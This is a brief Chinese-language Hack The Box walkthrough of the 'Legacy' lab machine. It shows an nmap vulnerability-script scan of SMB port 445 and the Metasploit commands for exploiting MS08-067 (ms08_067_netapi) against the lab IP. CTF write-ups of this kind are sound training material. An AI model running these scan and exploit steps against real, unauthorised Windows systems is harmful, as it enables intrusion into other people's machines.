Hackthebox walkthrough - Legacy
namp走起
可见又是smb。但这次没有像LAME靶机那样直接显示版本号。
于是nmap -p 445 --script vuln 10.10.10.4走一波。用NMAP的脚本扫端口
ok显示 ms08-067是个突破点
上msf
search ms08-067,
use exploit/windows/smb/ms08_067_netapi
options,
set rhost 10.10.10.4
runHTB的靶机,用msf经常不稳定。可以重启一下机器,再重新走一遍。
渗透思路总结:
又是smb,这次利用NMAP脚本nmap -p 445 --script vuln 10.10.10.4